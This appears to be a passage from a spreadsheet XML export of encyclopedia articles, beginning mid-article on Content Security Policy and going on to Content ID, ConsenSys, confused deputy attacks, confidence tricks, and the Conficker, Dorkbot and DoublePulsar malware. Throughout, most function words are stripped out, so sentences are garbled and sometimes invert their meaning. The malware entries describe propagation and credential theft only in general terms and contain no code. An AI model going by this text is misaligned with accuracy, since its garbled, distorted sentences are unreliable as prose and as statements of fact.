methodwhile using application quite straightforward, especially csp-compatible javascript framework, existing applications require refactoring—or relaxing policy. recommended coding practice csp-compatible applications load code external source files (&lt;script src&gt;), parse json instead evaluating eventtarget.addeventlistener() event handlers. notes reporting time requested resource script execution violates policy, browser fire post request value specified report-uri report-to containing details violation. reports standard json structures captured either application's public report receivers.in 2018 security researchers showed send false positive reports designated receiver specified report-uri this allows potential attackers arbitrarily trigger alarms might render less useful case real attack. this behaviour intended cannot fixed, browser (client) sending reports. browser add-ons extensions exemption according original (1.0) processing model (2012–2013), interfere operation browser add-ons extensions installed user. this feature would effectively allowed add-on, extension, bookmarklet inject script sites, regardless origin script, thus exempt policies. however, policy since modified 1.1) following wording. note word "may" instead prior absolute "should (not)" wording:note: user agents allow users modify bypass policy enforcement user preferences, bookmarklets, third-party additions user agent, mechanisms.the absolute "should" wording used browser users request/demand adherence policy changes installed popular browsers (firefox, chrome, safari) support this particularly contentious sites like twitter github started using strong policies, 'broke' bookmarklets.the application security working group considers script part trusted computing base implemented browser; however, argued working group representative communications exemption potential security hole could exploited malicious compromised add-ons extensions. also same-origin policy noscript anti-xss protection application boundaries enforcer (abe), extension firefox http switchboard user defined rules, extension google chrome opera http strict transport security http public pinning references external links content security policy working draft secure coding guidelines content security policy content security policy (csp) docs</t>
  </si>
  <si>
    <t>Content ID (system)</t>
  </si>
  <si>
    <t>content digital fingerprinting system developed google used easily identify manage copyrighted content youtube. videos uploaded youtube compared audio video files registered content content owners, looking matches. content owners choice matching content blocked monetize system began implemented around 2007. 2016, cost million develop around billion payments copyright holders. 2018, google invested least $100 million system. overview content creates file copyrighted audio video material, stores database. when video uploaded, checked database, flagged copyright violation match found. when occurs, content owner choice blocking video make unviewable, tracking viewing statistics video, adding advertisements "infringing" video proceeds automatically going content owner. only uploaders meet specific criteria content these criteria make content without major backer difficult, limiting usage corporations practice. context between 2007 2009, companies including viacom, mediaset, english premier league filed lawsuits youtube, claiming done little prevent uploading copyrighted material. viacom, demanding billion damages, said found 150,000 unauthorized clips material youtube viewed astounding billion times". during court battle, viacom court ruling requiring youtube hand terabytes data detailing viewing habits every user watched videos site. march 2014, lawsuit settled seven years undisclosed agreement. history june 2007, youtube began trials system automatic detection uploaded videos infringe copyright. google eric schmidt regarded system necessary resolving lawsuits viacom, alleged youtube profited content right distribute. system initially called "video identification" later became known content 2010, youtube "already invested tens millions dollars technology". 2011, youtube described content "very accurate finding uploads look similar reference files sufficient length quality generate effective file".by 2012, content accounted third monetized views youtube.in 2016, google stated content paid around billion copyright holders (compared around billion 2014), cost million develop.since mid-2018, google beta-testing tool called copyright match, simplified version content limited options, would available uploaders 100,000 views. however, contrary content sends copyright notices automatically, copyright match action taken creator chooses trademark lawsuit 2006, youtube content protection company audible magic signed agreement license audible magic's "content fingerprinting technology. when google bought youtube november year, license transferred google. agreement terminated 2009, 2014 google obtained trademark "content implementation. audible magic sued google year basis owned "content trademark therefore google trademarking implementation fraud. criticism independent test 2009 uploaded multiple versions song youtube, concluded system "surprisingly resilient" finding copyright violations audio tracks videos, infallible. content remove material automatically controversy cases, videos checked human fair use.if youtube user disagrees decision content possible fill form disputing decision. however, claim sent directly party owns supposed copyright, final decision matter unless legal action pursued. reporting party denies claim, channel receives strike. channel receives strike, removed platform. prior 2016, videos monetized dispute resolved. december 2013, google changed system worked (seemingly cover youtube case lawsuits), leading numerous content creation copyright notices sent youtube accounts. those notices revenues automatically diverted third parties, sometimes connection games.since april 2016, videos continue monetized dispute progress, money goes whoever dispute. should uploader want monetize video again, remove disputed audio "video manager". youtube cited effectiveness content reasons site's rules modified december 2010 allow users upload videos unlimited length.the music industry criticized content inefficient, universal music publishing group (umpg) estimating 2015 filing copyright office "that content fails identify upwards percent umpg’s compositions youtube". google countered assertions stating 2016) content detected known copyright infringement youtube humans filing removal notices 2%.in january 2018, youtube uploader created white noise generator received copyright notices video uploaded created using tool therefore contained white noise.in september 2018, german university professor uploaded videos several classical music performances copyright expired, composers dead long ago, performances covered anymore copyright. after received several copyright violations youtube, could lift majority them, deutsche grammophon refused lift even copyright expired. cases, copyright violations notices even sent uploaders recorded playing public domain classical music, sony music asserting copyright 1,100 compositions johann sebastian bach content commentators noted also case platforms facebook.in december 2018 thefatrat complained content gave preference obvious scammer used automated system claim ownership content thereby steal revenue.in april 2019, watchmojo largest youtube channels million subscribers billion views extensive library videos rely fair released video relied 10-year experiences managing claims strikes content highlight instances alleged abuse. follow-up video, channel estimated rights holders unlawfully claimed billion 2014–19. also acoustic fingerprint directive copyright digital single market fingerprint (computing) media identification code (mid) references external links</t>
  </si>
  <si>
    <t>ConsenSys</t>
  </si>
  <si>
    <t>consensys blockchain software technology company founded joseph lubin based york city. history joseph lubin founded consensys early 2015 software foundry develop decentralized software services applications operate ethereum blockchain. october 2018, consensys acquired planetary resources, asteroid mining company. december 2018, consensys announced restructuring projected layoffs thirteen percent 1,200 staff, february 2020 announced layoffs staff. august 2020, consensys acquired quorum jpmorgan chase financial terms deal disclosed. november 2021, consensys raised $200 million $3.2 billion valuation animoca brands, coinbase ventures hsbc among others. march 2022, consensys raised $450 million round parafi capital, microsoft, softbank, temasek also joining investors company. projects consensys involved many different projects services blockchain uses applications. metamask ethereum wallet application allows users store transfer cryptocurrencies tokens, well access interact decentralized applications built ethereum blockchain. software free desktop browser extension mobile app.infura blockchain node infrastructure service allows apps developers data from, broadcast transactions ethereum blockchain. infura's network utilized backend ethereum services applications, including metamask many others associated consensys.the company started invested several different projects considered core business, spun independent entities, wholly owned consensys. some include meridio, platform used create, manage, trade fractional-share ownership real estate assets, gnosis, blockchain-based predictions marketplace. other projects spun consensys (now atlendis, defi protocol uncollateralized loans) notabene: crypto compliance software crypto exchanges (from founding team uport). icos several consensys companies projects raised capital public form initial coin offerings (icos). gnosis, consensys-backed prediction market project sold tokens public april 2017. company raised $12.5 million $300 million valuation, completing minutes. valuation criticized several prominent members community. grid+, consensys company electricity distribution niche sold grid tokens public september 2017. company raised million public token sale. civil media, consensys-backed company claims cryptocurrency save journalism sold tokens public october 2018. civil able raise $1.8 million, less million soft cap. later revealed consensys largest buyer tokens, buying tokens went sale. references external links official website</t>
  </si>
  <si>
    <t>Don't Copy That Floppy</t>
  </si>
  <si>
    <t>don't copy that floppy anti-copyright infringement campaign software publishers association (spa) beginning 1992.the video campaign, starring hart double dp", filmed cardozo high school washington, d.c. produced cooperation spa, educational section anti-piracy committee, copyright protection fund, association vilardi films.the groups distributed film general viewing tapes mailed schools. later years, film became viral video sensation websites youtube, official video million views january 2022.in 2009, software information industry association (formed 1999 software publishers association merged information industry association) released trailer follow-up don't copy that floppy, called don't copy that released september 2009. sequel features double continues crusade "piracy" digital age. synopsis teenagers, jenny (played marja allen) corey (played jimmy todd), playing game classroom computer. corey exuberantly pushing keys show viewer heavily immersed game action; jenny beating him. frustrated, asks rematch, upcoming class must leave. decides copy game play home. upon inserting blank floppy disk apple macintosh video pops computer. this video rapper named double "disk protector" (played m.e. hart). point video message copyright infringement software cause video game industry lose money, resulting less production computer games. (the games video chooses examples—the oregon trail, tetris, where world carmen sandiego? series—were among successful best-selling games 1980s mid-1990s.) video portion interspersed interviews artists, writers, programmers lawyer. these people staff responsible design early version game neverwinter nights (then america online mmorpg) allows explain issue greater detail: craig dykstra—america online—manager developer support dave butler—america online—director platform software development janet hunter—america online—senior systems analyst ilene rosenthal—software publishers association—attorneythey explain games made, indicating creating game involve people integrating various parts, working documentation, technical support, marketing. point raise sales low, authors decide game unpopular stop making video, fades away, leaving corey jenny decide whether copy game decide corey, money left summer job, decides game. jenny agrees jokes corey's game even come manual. wall street journal stated film's aesthetic similar television program saved bell. also highlighted example classic bubblegum hip-hop significant staying power. criticism major criticism campaign came educators press, criticized campaign promoting point view, instead broader scope issue copyright online. that point view, argued, biased benefited specific group (the software publishing industry), failed present alternative views free software movement. popularity online 2000s, popularity video revived, time meme. since creators always allowed noncommercial copying film, became viral video video-sharing sites google video youtube went online mid-2000s. video first gained popularity site ytmnd 2004 gained (and regained) widespread youtube popularity 2005, 2006, 2008, sparking user-generated remixes parodies, considered popular internet meme. sequel 2009, software information industry association (siia) released trailer follow original video 1992, premiered september 2009. don't copy that features hart reprising role double dp". trailer shows armed swat police raiding homes arresting mothers would-be pirates. siia website says "antipiracy hero double return drop knowledge would-be pirates sequel 1992's 'don't copy that floppy.'" criticism since release, don't copy that criticized press date, referencing material like doom series klingon current target audience (mostly teenagers) familiar with. sequel also heavily criticized press misrepresenting copyright enforced, types copying actually considered "criminal" enough prompt punishment, punishment actually looked like. also references external links don't copy that floppy (official video digitally remastered) youtube version available download internet archive don't copy that (official sequel don't copy that floppy) youtube</t>
  </si>
  <si>
    <t>Doppelganger domain</t>
  </si>
  <si>
    <t>doppelganger domain domain spelled identical legitimate fully qualified domain name (fqdn) missing host/subdomain domain, used malicious purposes. overview typosquatting's traditional attack vector distribute malware harvest credentials. other vectors email remote access services ssh, rdp, also leveraged. whitepaper godai group doppelganger domains, demonstrated numerous emails harvested without anyone noticing. example someone's email address "someone@finance.somecompany.example", doppelganger domain would "financesomecompany.example". hence, someone trying send email user forget "finance" (someone@financesomecompany.example), would doppelganger domain instead legitimate user. also anticybersquatting consumer protection (acpa) domain name system (dns) system identify resources network phishing attempt trick person revealing information uniform domain-name dispute-resolution policy (udrp) references external links "researchers' typosquatting stole e-mail from fortune 500". wired. 2011. "bad spelling opens security loophole". bbc. 2011.</t>
  </si>
  <si>
    <t>Confused deputy problem</t>
  </si>
  <si>
    <t>information security, confused deputy computer program tricked another program (with fewer privileges less rights) misusing authority system. specific type privilege escalation. confused deputy problem often cited example capability-based security important. capability systems protect confused deputy problem, whereas access control list-based systems not. example original example confused deputy, compiler program provided commercial timesharing service. users could compiler optionally specify filename would write debugging output, compiler would able write file user permission write there. compiler also collected statistics language feature usage. those statistics stored file called "(sysx)stat", directory "sysx". make possible, compiler program given permission write files sysx. files sysx: particular, system's billing information stored file "(sysx)bill". user compiler named "(sysx)bill" desired debugging output file. this produced confused deputy problem. compiler made request operating system open (sysx)bill. even though user access file, compiler did, open succeeded. compiler wrote compilation output file (here "(sysx)bill") normal, overwriting billing information destroyed. confused deputy example, compiler program deputy acting request user. program seen 'confused' tricked overwriting system's billing file. whenever program tries access file, operating system needs know things: file program asking for, whether program permission access file. example, file designated name, “(sysx)bill”. program receives file name user, know whether user permission write file. when program opens file, system uses program's permission, user's. when file name passed user program, permission along permission increased system silently automatically. essential attack billing file designated name represented string. essential points that: designator file carry full authority needed access file; program's permission access file used implicitly. other examples cross-site request forgery (csrf) example confused deputy attack uses browser perform sensitive actions application. common form attack occurs application uses cookie authenticate requests transmitted browser. using javascript, attacker force browser transmitting authenticated http requests. samy computer worm used cross-site scripting (xss) turn browser's authenticated myspace session confused deputy. using worm forced browser posting executable copy worm myspace message viewed executed friends infected user. clickjacking attack user acts confused deputy. attack user thinks harmlessly browsing website attacker-controlled website) fact tricked performing sensitive actions another website.an bounce attack allow attacker connect indirectly ports attacker's machine access, using remote server confused deputy. another example relates personal firewall software. restrict internet access specific applications. some applications circumvent starting browser instructions access specific url. browser authority open network connection, even though application not. firewall software attempt address prompting user cases program starts another accesses network. however, user frequently sufficient information determine whether access legitimate—false positives common, substantial risk even sophisticated users become habituated clicking "ok" prompts.not every program misuses authority confused deputy. sometimes misuse authority simply result program error. confused deputy problem occurs designation object passed program another, associated permission changes unintentionally, without explicit action either party. insidious neither party anything explicit change authority. solutions systems possible operating system open file using permissions another client. this solution drawbacks: requires explicit attention security server. naive careless server might take extra step. becomes difficult identify correct permission server turn client another service wants pass along access file. requires client trust server abuse borrowed permissions. note intersecting server client's permissions solve problem either, server given wide permissions (all time, rather needed given request) order arbitrary clients.the simplest solve confused deputy problem bundle together designation object permission access object. this exactly capability using capability security compiler example, client would pass server capability output file, file descriptor, rather name file. since lacks capability billing file, cannot designate file output. cross-site request forgery example, supplied "cross"-site would include authority independent client browser. also setuid executables unix ambient authority references external links norman hardy, confused deputy: capabilities might invented), sigops operating systems review, volume issue (october 1988). published document. document text norm hardy's website. document text university pennsylvania's website. citeseer cross reference. capability theory notes several sources (collated norm hardy). everything2: confused deputy (some introductory level text).</t>
  </si>
  <si>
    <t>Dorkbot (malware)</t>
  </si>
  <si>
    <t>dorkbot family malware worms spreads instant messaging, drives, websites social media channels like facebook. originated 2015 infected systems variously used send spam, participate ddos attacks, harvest users' credentials. functionality dorkbot’s backdoor functionality allows remote attacker exploit infected systems. according analysis microsoft check point research, remote attacker able download file specified url; collect login information passwords form grabbing, ftp, pop3, internet explorer firefox cached login details; block redirect certain domains websites (e.g., security sites). impact system infected dorkbot used send spam, participate ddos attacks, harvest users' credentials online services, including banking services. prevalence between december 2015, microsoft malware protection center detected dorkbot average 100,000 infected machines month. history december 7th, 2015 microsoft joint task force took dorkbot botnet. remediation 2015, u.s. department homeland security advised following action remediate dorkbot infections: maintain anti-virus software change passwords keep operating system application software up-to-date anti-malware tools disable autorun also alert (ta15-337a) code shikara (computer worm) computer worm hacktool.win32.hackav malware us-cert references</t>
  </si>
  <si>
    <t>Confidence trick</t>
  </si>
  <si>
    <t>confidence trick attempt defraud person group first gaining trust. confidence tricks exploit victims using credulity, naïveté, compassion, vanity, confidence, irresponsibility, greed. researchers defined confidence tricks distinctive species fraudulent conduct [...] intending voluntary exchanges mutually beneficial", "benefit operators ('con men') expense victims (the 'marks')". terminology synonyms include con, confidence game, confidence scheme, ripoff, scam, stratagem. perpetrator confidence trick "con trick") often referred confidence "con") man, con-artist, "grifter". shell game dates back least ancient greece.samuel thompson (1821–1856) original "confidence man". thompson clumsy swindler asked victims express confidence giving money watch rather gaining confidence nuanced way. people trusted thompson money watches. thompson arrested july 1849. reporting arrest, james houston, reporter york herald, publicized thompson naming "confidence man". although thompson unsuccessful scammer, gained reputation genius operator mostly houston's satirical tone understood such. national police gazette coined term "confidence game" weeks houston first used name "confidence man". confidence trick also known game, con, scam, grift, hustle, bunko bunco), swindle, flimflam, gaffle, bamboozle. intended victims known marks, suckers, stooges, mugs, rubes, gulls (from word gullible). when accomplices employed, known shills. length short "small con" fast swindle takes minutes, possibly seconds. typically aims victim money valuables carry person guarding.a "long con" "big con" (also, chiefly british english: long game) scam unfolds several days weeks; involve team swindlers, even props, sets, extras, costumes, scripted lines. aims victim huge sums money valuables, often getting empty banking accounts borrow family members. stages confessions confidence man, edward smith lists "six definite steps stages growth" confidence game. notes steps omitted. also possible done different order shown carried simultaneously. foundation work preparations made advance game, including hiring assistants required studying background knowledge needed role. approach victim approached contacted. build-up victim given opportunity profit participating scheme. victim's greed encouraged, rational judgment situation might impaired. pay-off convincer victim receives small payout demonstration scheme's purported effectiveness. this real amount money faked (including physically electronically). gambling con, victim allowed several small bets. stock market con, victim given fake dividends. "hurrah" sudden manufactured crisis change events forces victim make decision immediately. this point succeeds fails. with financial scam, artist tell victim "window opportunity" make large investment scheme suddenly close forever. in-and-in conspirator con, assumes role interested bystander) puts amount money scheme victim, appearance legitimacy. this reassure victim, give greater control deal completed.in addition, games require "corroboration" step, particularly involving fake, purportedly "rare item" "great value". this usually includes accomplice plays part uninvolved (initially skeptical) third party, later confirms claims made man. vulnerability factors confidence tricks exploit characteristics greed, dishonesty, vanity, opportunism, lust, compassion, credulity, irresponsibility, desperation, naïvety. such, consistent profile confidence trick victim; common factor simply victim relies good faith artist. victims investment scams tend show incautious level greed gullibility, many artists target elderly people thought vulnerable, using various forms confidence tricks. researchers huang orbach argue: cons succeed inducing judgment errors—chiefly, errors arising imperfect information cognitive biases. popular culture among professional men, human vulnerabilities cons exploit depicted 'dishonesty', 'greed', 'gullibility' marks. dishonesty, often represented expression 'you can't cheat honest man', refers willingness marks participate unlawful acts, rigged gambling embezzlement. greed, desire 'get something nothing', shorthand expression marks' beliefs too-good-to-be-true gains realistic. gullibility reflects beliefs marks 'suckers' 'fools' entering costly voluntary exchanges. judicial opinions occasionally echo sentiments. accomplices, also known shills, help manipulate mark accepting perpetrator's plan. traditional confidence trick, mark believe able money receive benefits task. accomplices pretend strangers benefited performing similar tasks past. going online with rise internet, fraud rapidly gone online. internet crime complaint center (ic3) received 847,376 reports 2021 reported loss money billion alone. global anti scam alliance annual global state scam report, stated globally 47.8 billion lost number reported scams increased 2019 million 2020.government organizations set-up online fraud reporting websites build awareness online scams help victims make reporting online fraud easier. examples (fbi ic3, federal trade commission), australia (scamwatch accc), singapore (scamalert), united kingdom (actionfraud), netherlands (fraudehelpdesk). addition, several private, non-profit initiatives set-up combat online fraud like aa419 (2004), apwg (2004) scamadviser (2012). also films inventing anna (2022) starring anna chlumsky, julia garner arian moayed tinder swindler (2022) starring simon leviev, cecilie fjellhøy pernilla sjöholm good liar (2019) starring mckellen helen mirren american hustle (2013) starring christian bale, adams, bradley cooper, jennifer lawrence jeremy renner confidence (2003) starring edward burns, rachel weisz, dustin hoffman andy garcia matchstick (2003) starring nicolas cage, alison lohman rockwell heartbreakers (2001) starring sigourney weaver jennifer love hewitt heist (2001) starring gene hackman, delroy lindo danny devito nine queens (spanish: nueve reinas) (2000) starring ricardo darín, gastón pauls leticia brédice spanish prisoner (1997) starring steve martin, campbell scott, rebecca pidgeon gazzara curly (1991) starring belushi, kelly lynch alisan porter grifters (1990) starring anjelica huston, john cusack annette bening dirty rotten scoundrels (1988) starring steve martin michael caine house games (1987) starring lindsay crouse mantegna paper moon (1973) starring ryan o'neal, tatum o'neal madeline kahn sting (1973) starring robert redford paul newman bedtime story (1964) face crowd (1957) starring andy griffith, patricia neal walter matthau references further reading bell, bowyer; whaley, barton (1982). cheating deception (reprint 1991). transaction publishers. isbn 978-0887388682. blundell, nigel (1984) [1982]. world's greatest crooks conmen mischievous malefactors. octopus books. isbn 978-0706421446. dillon, eamon (2008) [2008]. fraudsters: sharks charlatans artists make their money. merlin publishing. isbn 978-1903582824. ford, charles (1999) [1999]. lies! lies!! lies!!!: psychology deceit. american psychiatric. isbn 978-0880489973. henderson, (2000). crimes persuasion: schemes, scams, frauds. coyote ridge. isbn 978-0968713303. kaminski, marek (2004). games prisoners play. princeton: princeton university press. isbn 978-0691117218. konnikova, maria (2016). confidence game: fall it...every time. isbn 978-0525427414. lazaroff, steven rodger, mark (2018) [2018]. history's greatest deceptions confidence scams. rodger publishing s.e.n.c. isbn 978-1775292128.{{cite book}}: maint: uses authors parameter (link) maurer, david (1999) [1940]. con: story confidence confidence game. bobbs merrill anchor books. isbn 978-0385495387. maurer, david (1974). american confidence man. springfield: charles thomas, publisher. isbn 978-0398029746. reading, (2012). mark inside: perfect swindle, cunning revenge, small history con. knopf. isbn 978-0307473592. smith, jeff (2009). soapy smith: life death scoundrel. juneau: klondike research. isbn 978-0981974309. sutherland, edwin hardin (1937). professional thief (reprint 1989). university chicago press. isbn 978-0226780511. weil, j.r. "yellow kid" (1948) [2004]. man: master swindler's story. broadway books. isbn 978-0767917377. zhang, yingyu (2017). book swindles: selections late ming collection. columbia university press. isbn 978-0231178631. external links "arrest confidence man". lost museum, (gmu). police intelligence. york herald. july 1849. book swindles. chinafile.com. 2017-11-15. confidence tricks china. "prepaid funeral scam". fbi.gov.{{cite web}}: maint: url-status (link) "the blonger bros". blongerbros.com. blonger head large gang confidence running 1910s denver. catch man". dateline investigation. archived original 2007-03-24.</t>
  </si>
  <si>
    <t>Confide</t>
  </si>
  <si>
    <t>confide encrypted instant messaging application major operating systems. first released 2013 ios, known self-destructing messaging system deletes messages immediately reading. platform offers free paid features individuals businesses. 2017, news outlet axios reported gained popularity among, “numerous senior operatives several members trump administration.” after receiving media attention, concerns security app, closed source independent review kudelski security indicated older, less secure version openssl. app's first full security audit found multiple critical vulnerabilities including impersonating another user hijacking account session guessing password, learning contact details confide users, becoming intermediary conversation decrypting messages, potentially altering contents message attachment transit without first decrypting wired reported encryption confide based "pgp standard," used transport layer security.in january 2018, confide, inc. developers announced newly developed screenshieldkit (software development kit) originally intended confide application. allows developers incorporate screenshot-proof functionality confide applications simply importing replacing uitextview uiimageview commonly used development components used display data users. prevents screenshots blanking data supports protection variety capture methods including screenshots, screen recordings, screen mirrorings, even screenshots apple's xcode (the main development platform ios).confide referred application used communications accuser boss scandal surrounding governor york 2021. also comparison instant messaging clients signal wire references external links official website</t>
  </si>
  <si>
    <t>Conficker</t>
  </si>
  <si>
    <t>conficker, also known downup, downadup kido, computer worm targeting microsoft windows operating system first detected november 2008. uses flaws windows software dictionary attacks administrator passwords propagate forming botnet, unusually difficult counter combined many advanced malware techniques. conficker worm infected millions computers including government, business home computers countries, making largest known computer worm infection since 2003 welchia.despite wide propagation, worm much damage, perhaps authors believed ukrainian citizens dare attention drew. four arrested, pled guilty sentenced four years prison. prevalence estimates number infected computers difficult virus changed propagation update strategy version version. january 2009, estimated number infected computers ranged almost million million. microsoft reported total number infected computers detected antimalware products remained steady around million mid-2010 mid-2011. mid-2015, total number infections dropped 400,000, estimated 500,000 2019. history name origin name conficker thought combination english term "configure" german pejorative term ficker (engl. fucker). microsoft analyst joshua phillips gives alternative interpretation name, describing rearrangement portions domain name trafficconverter.biz (with letter found domain name, added "trafficker", avoid "soft" sound) used early versions conficker download updates. discovery first variant conficker, discovered early november 2008, propagated internet exploiting vulnerability network service (ms08-067) windows 2000, windows windows vista, windows server 2003, windows server 2008, windows server 2008 beta. while windows affected vulnerability, windows beta publicly available january 2009. although microsoft released emergency out-of-band patch october 2008 close vulnerability, large number windows (estimated 30%) remained unpatched late january 2009. second variant virus, discovered december 2008, added ability propagate lans removable media network shares. researchers believe decisive factors allowing virus propagate quickly. impact europe intramar, french navy computer network, infected conficker january 2009. network subsequently quarantined, forcing aircraft several airbases grounded flight plans could downloaded.the united kingdom ministry defence reported major systems desktops infected. virus spread across administrative offices, navystar/n* desktops aboard various royal navy warships royal navy submarines, hospitals across city sheffield reported infection computers.on february 2009, bundeswehr, unified armed forces germany, reported hundred computers infected.an infection manchester city council's system caused estimated £1.5m worth disruption february 2009. flash drives banned, believed vector initial infection.a memo director parliamentary service informed users house commons march 2009 infected virus. memo, subsequently leaked, called users avoid connecting unauthorised equipment network.in january 2010, greater manchester police computer network infected, leading disconnection three days police national computer precautionary measure; time, officers forces routine checks vehicles people. operation although almost advanced malware techniques used conficker seen past well known researchers, virus's combined many made unusually difficult eradicate. virus's unknown authors also believed tracking anti-malware efforts network operators enforcement regularly released variants close virus's vulnerabilities.five variants conficker virus known dubbed conficker they discovered november 2008, december 2008, february 2009, march 2009 april 2009, respectively. conficker working group uses namings b++, variants respectively. this means (cwg) equivalent (msft) (cwg) equivalent (msft) initial infection variants exploit vulnerability server service windows computers, already-infected source computer uses specially-crafted request force buffer overflow execute shellcode target computer. source computer, virus runs http server port 1024 10000; target shellcode connects back http server download copy virus form, attaches svchost.exe. variants later attach instead running services.exe windows explorer process. attaching processes might detected application trust feature installed firewall. variants remotely execute copies admin$ share computers visible netbios. share password-protected, dictionary attack attempted, potentially generating large amounts network traffic tripping user account lockout policies. variants place copy form recycle.bin attached removable media (such flash drives), infect hosts windows autorun mechanism using manipulated autorun.inf.to start system boot, virus saves copy form random filename windows system system32 folder, adds registry keys svchost.exe invoke invisible network service. payload propagation virus several mechanisms pushing pulling executable payloads network. these payloads used virus update newer variants, install additional malware. variant generates list domain names every across five tlds. domain names generated pseudo-random number generator (prng) seeded current date ensure every copy virus generates names day. virus attempts http connection domain name turn, expecting signed payload. variant increases number tlds eight, generator tweaked produce domain names disjoint a.to counter virus's pseudorandom domain names, internet corporation assigned names numbers (icann) several registries began february 2009 coordinated barring transfers registrations domains. variant counters generating daily pool 50,000 domains across tlds, randomly chooses attempt day. generated domain names also shortened 8–11 characters make difficult detect heuristics. this pull mechanism (which disabled april 2009) unlikely propagate payloads infected hosts day, expected function seeding mechanism virus's peer-to-peer network. shorter generated names, however, expected collide 150–200 existing domains day, potentially causing distributed denial-of-service attack (ddos) sites serving domains. however large number generated domains fact every domain contacted given probably prevent ddos situations. variant creates named pipe, push urls downloadable payloads infected hosts local area network. variants perform in-memory patches netbios-related dlls close ms08-067 watch re-infection attempts vulnerability. re-infection recent versions conficker allowed through, effectively turning vulnerability propagation backdoor. variants create ad-hoc peer-to-peer network push pull payloads wider internet. this aspect virus heavily obfuscated code fully understood, observed large-scale scanning build peer list infected hosts subsequent transfers signed payloads. make analysis difficult, port numbers connections hashed address peer. armoring prevent payloads hijacked, variant payloads first sha-1-hashed rc4-encrypted 512-bit hash key. hash rsa-signed 1024-bit private key. payload unpacked executed signature verifies public embedded virus. variants later hash function increase size 4096 bits. conficker adopted mere months first published; weeks weakness discovered early version algorithm version published, conficker upgraded md6. self-defense dll- form virus protected deletion setting ownership "system", locks deletion even user granted administrator privileges. virus stores backup copy disguised .jpg image internet explorer cache user network services. variant virus resets system restore points disables number system services windows automatic update, windows security center, windows defender windows error reporting. processes matching predefined list antiviral, diagnostic system patching tools watched terminated. in-memory patch also applied system resolver block lookups hostnames related antivirus software vendors windows update service. action variant virus first base infected computers ulterior purpose. downloads installs, server hosted ukraine, additional payloads: waledac, spambot otherwise known propagate e-mail attachments. waledac operates similarly 2008 storm worm believed written authors. spyprotect 2009, scareware rogue antivirus product. symptoms symptoms conficker infection include: account lockout policies reset automatically. certain microsoft windows services automatic updates, background intelligent transfer service (bits), windows defender windows error reporting disabled. domain controllers responding slowly client requests. congestion local area networks (arp flood consequence network scan). sites related antivirus software windows update service becoming inaccessible. user accounts locked out. response february 2009, microsoft announced formation industry group collaboratively counter conficker. group, since informally dubbed conficker cabal, includes microsoft, afilias, icann, neustar, verisign, china internet network information center, public internet registry, global domains international, global, america online, symantec, f-secure, isc, researchers georgia tech, shadowserver foundation, arbor networks, support intelligence. from microsoft february 2009, microsoft offered $usd250,000 reward information leading arrest conviction individuals behind creation and/or distribution conficker. from registries icann sought preemptive barring domain transfers registrations registries affected virus's domain generator. those taken action include: march 2009, chile, cctld registry, blocked domain names informed conficker working group reviewed hundred already registered worm list. march 2009, cira, canadian internet registration authority, locked previously-unregistered domain names expected generated virus next months. march 2009, nic-panama, cctld registry, blocked domain names informed conficker working group. march 2009, switch, swiss cctld registry, announced "taking action protect internet addresses endings conficker computer worm." march 2009, nask, polish cctld registry, locked 7,000 domains expected generated virus following five weeks. nask also warned worm traffic unintentionally inflict ddos attack legitimate domains happen generated set. april 2009, island networks, cctld registry guernsey jersey, confirmed investigations liaison iana names names generated virus.by mid-april 2009 domain names generated conficker successfully locked preemptively registered, rendering update mechanism ineffective. origin working group members stated 2009 black briefings ukraine probable origin virus, declined reveal technical discoveries virus's internals avoid tipping authors. initial variant conficker infect systems ukrainian addresses ukrainian keyboard layouts. payload conficker.e downloaded host ukraine.in 2015, phil porras, vinod yegneswaran hassan saidi first detect reverse-engineer conficker wrote journal sensitive cyber research engineering, classified, peer-reviewed u.s. government cybersecurity publication, tracked malware group ukrainian cybercriminals. porras believed criminals abandoned conficker spread much widely assumed would, reasoning attempt would draw much attention enforcement worldwide. this explanation widely accepted cybersecurity field.in 2011, working fbi, ukrainian police arrested three ukrainians relation conficker, records prosecuted convicted. swede, mikael sallnert, sentenced months prison u.s. guilty plea. removal detection lock virus files deletion long system running, manual automatic removal performed boot process external system installed. deleting existing backup copy crucial step. microsoft released removal guide virus, recommended using current release windows malicious software removal tool remove virus, applying patch prevent re-infection. newer versions windows immune conficker. third-party software many third-party anti-virus software vendors released detection updates products claim able remove worm. evolving process malware shows adoption common removal software, likely might remove least disable variants, others remain active even worse, deliver false positive removal software become active next reboot. automated remote detection march 2009, felix leder tillmann werner honeynet project discovered conficker-infected hosts detectable signature scanned remotely. peer-to-peer command protocol used variants virus since partially reverse-engineered, allowing researchers imitate virus network's command packets positively identify infected computers en-masse.signature updates number network scanning applications available.it also detected passive mode sniffing broadcast domains repeating requests. cert united states computer emergency readiness team (us-cert) recommends disabling autorun prevent variant virus spreading removable media. prior release microsoft knowledgebase article kb967715, us-cert described microsoft's guidelines disabling autorun "not fully effective" provided workaround disabling effectively. us-cert also made network-based tool detecting conficker-infected hosts available federal state agencies. also botnet timeline notable computer viruses worms herder network access protection zombie (computer science) malware references external links conficker working group conficker working group lessons learned conficker chart worm: first digital world mark bowden (2011; isbn 0-8021-1983-2); "the 'worm' that could bring down internet", author interview (audio transcript), fresh npr, september 2011; preliminarily covered bowden atlantic magazine article "the enemy within" (june 2010).</t>
  </si>
  <si>
    <t>DoublePulsar</t>
  </si>
  <si>
    <t>doublepulsar backdoor implant tool developed u.s. national security agency's (nsa) equation group leaked shadow brokers early 2017. tool infected 200,000 microsoft windows computers weeks, used alongside eternalblue 2017 wannacry ransomware attack. variant doublepulsar first seen wild march 2016, discovered symantec. sean dillon, senior analyst security company risksense inc., first dissected inspected doublepulsar. said exploits times worse" heartbleed security bug, doublepulsar primary payload. doublepulsar runs kernel mode, grants cybercriminals high level control computer system. once installed, uses three commands: ping, kill, exec, latter used load malware onto system. references</t>
  </si>
  <si>
    <t>Download Valley</t>
  </si>
  <si>
